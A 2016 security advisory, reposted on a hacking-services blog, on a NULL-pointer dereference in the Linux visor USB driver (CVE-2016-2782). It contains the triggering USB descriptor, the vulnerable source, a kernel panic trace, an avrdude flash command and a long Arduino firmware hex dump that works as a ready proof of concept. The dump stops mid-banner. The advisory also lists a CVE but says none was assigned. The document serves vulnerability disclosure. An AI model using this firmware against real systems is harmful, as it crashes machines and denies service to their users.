Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130442

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
OS-S Security Advisory 2016-10
Linux visor (treo_attach) Nullpointer Dereference

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: CVE-2016-2782
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (visor treo_attach driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the 
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net/advisories/OSS-2016-10_visor_treo_attach.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB 
device requiring the visor (treo_attach) driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength:	0x12
bDescriptorType:	0x1
bcdUSB:	0x200
bDeviceClass:	0x3
bDeviceSubClass:	0x0
bDeviceProtocol:	0x0
bMaxPacketSize:	0x40
idVendor:	0x82d
idProduct:	0x200
bcdDevice:	0x100
iManufacturer:	0x1
iProduct:	0x2
iSerialNumbers:	0x3
bNumConfigurations:	0x1

The treo_attach function does not use the num_ports (struct usb_serial) value 
for any kind of sanity checks during the initialization process. Due to an 
incomplete sanity check, the driver could try to dereference a null-pointer if 
a malformed device-descriptor is presented (zero-value for bNumEndpoints or no 
required endpoint-descriptors is provided).
This results in a crash of the system.

****
...
554 #define COPY_PORT(dest, src) 555 do { 556 int i; 557 558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { 559 dest->read_urbs[i] = src->read_urbs[i]; \ /* Possible 
Nullpointer-Dereference */
560 dest->read_urbs[i]->context = dest; 561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; 562 } 563 dest->read_urb = src->read_urb; 564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;565 dest->bulk_in_buffer = src->bulk_in_buffer; 566 dest->bulk_in_size = src->bulk_in_size; 567 dest->interrupt_in_urb = src->interrupt_in_urb; 568 dest->interrupt_in_urb->context = dest; 569 dest->interrupt_in_endpointAddress = 570 src->interrupt_in_endpointAddress;571 dest->interrupt_in_buffer = src->interrupt_in_buffer; 572 } while (0);
573
574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL);
575 if (!swap_port)
576 return -ENOMEM;
577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */
578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */
579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */
...
****

[*] Configuration-Descriptor
bLength:	0x9
bDescriptorType:	0x2
wTotalLength:	0x27
bNumInterfaces:	0x1
bConfigurationValue:	0x1
iConfiguration:	0x0
bmAttributes:	0x0
bMaxPower:	0x31
[*] Interface-Descriptor
bLength:	0x9
bDescriptorType:	0x4
bInterfaceNumber:	0x0
bAlternateSetting:	0x0
bNumEndpoints:	0x3
bInterfaceClass:	0x0
bInterfaceSubClass:	0x0
bInterfaceProtocol:	0x0
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x81	
bmAttribut:	0x3	
wMaxPacketSize:	0x404
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x1	
bmAttribut:	0x2	
wMaxPacketSize:	0x4
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x82	
bmAttribut:	0x1
wMaxPacketSize:	0x4
bInterval:	0xc

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This 
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U 
flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to 
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, 
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
This bug was fixed upstream. A CVE number was not assigned.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283374
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?i
d=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0

Kernel Stacktrace:

[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200
[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2, 
SerialNumber=3
[ 35.417186] usb 1-1: Product: Ä?
[ 35.421846] usb 1-1: Manufacturer: Ä?
[ 35.425686] usb 1-1: SerialNumber: %
[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc 
says 96 microframes
[ 35.493316] usbcore: registered new interface driver visor
[ 35.503150] usbserial: USB Serial support registered for Handspring Visor / 
Palm OS
[ 35.512980] usbserial: USB Serial support registered for Sony Clie 5.0
[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5
[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected
[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at 
00000000000000b0
[ 35.543244] IP: [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]
[ 35.543244] PGD 0 
[ 35.543244] Oops: 0002 [#1] SMP 
[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT 
xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables 
ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle 
ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat 
nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack 
iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm 
ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 
i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif 
cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy 
dm_mirror dm_region_hash dm_log dm_mod
[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted 
3.10.0-229.14.1.el7.x86_64 #1
[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 35.543244] RIP: 0010:[<ffffffffa0393651>] [<ffffffffa0393651>] 
treo_attach+0x61/0x340 [visor]
[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286
[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2
[ 35.543244] RDX: 0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400
[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400
[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404
[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400
[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) 
knlGS:0000000000000000
[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4: 
00000000000006f0
[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 35.543244] Stack:
[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007
[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400
[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100 
ffff88000bcd0090
[ 35.543244] Call Trace:
[ 35.543244] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230
[ 35.543244] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0
[ 35.543244] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0
[ 35.543244] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0
[ 35.543244] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100
[ 35.543244] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 35.543244] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 35.543244] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 35.543244] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 35.543244] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 35.543244] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 35.543244] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580
[ 35.543244] [<ffffffffa0398000>] ? 0xffffffffa0397fff
[ 35.543244] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor]
[ 35.543244] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 35.543244] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 35.543244] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 35.543244] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 35.543244] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 35.543244] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0 
0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48> 
89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90 
[ 35.543244] RIP [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor]
[ 35.543244] RSP <ffff88000bd23a78>
[ 35.543244] CR2: 00000000000000b0
[ 35.973188] ---[ end trace b239663354a1c556 ]---
[ 35.978862] Kernel panic - not syncing: Fatal exception
[ 35.979835] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
:1012C000781F891F9A1FA11D680F791F8A1F911D02
:1012D000A11D6A0F711D811D911DA11D20D009F452
:1012E00068943F912AE0269F11243019305D319394
:1012F000DEF6CF010895462F4770405D4193B3E07D
:101300000FD0C9F7F6CF462F4F70405D4A3318F023
:10131000495D31FD4052419302D0A9F7EACFB4E0D4
:10132000A6959795879577956795BA95C9F700978C
:101330006105710508959B01AC010A2E069457952D
:10134000479537952795BA95C9F7620F731F841F84
:10135000951FA01D0895EE0FFF1F0590F491E02D3D
:1013600009942F923F924F925F926F927F928F9249
:101370009F92AF92BF92CF92DF92EF92FF920F9324
:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E
:10139000F894DEBF0FBECDBF09942A8839884888EB
:1013A0005F846E847D848C849B84AA84B984C88481
:1013B000DF80EE80FD800C811B81AA81B981CE0F78
:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D
:0413D000F894FFCFBF
:1013D4001201000200000040AD0BEFBE000101024B
:1013E4000001220342006100640020004200410029
:1013F40042004500250078002500780025006E0095
:1014040025007000180342004100440020004300FE
:10141400300046004600450045002100120100024C
:10142400000000402D08000200010102030109022E
:10143400270001010000FA0705810304040C0705D5
:10144400010204000C0705820104000C07000700D8
:101454000700480100500072006F006C00690066CC
:101464000069006300000A550000006BFD180A00C3
:10147400809F0AB901312B940A8101128946001315
:10148400000257028B0A5E0AF80A5F01F212010099
:1014940002010000400D055702000101020301B9D9
:1014A4000A0100F80A5F0A810A220342006100640B
:1014B400002000420041004200450025007800253C
:1014C40000780025006E00250070001803420041DA
:1014D400004400200043003000460046004500451B
:1014E40000210012010002010000400D0557020016
:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
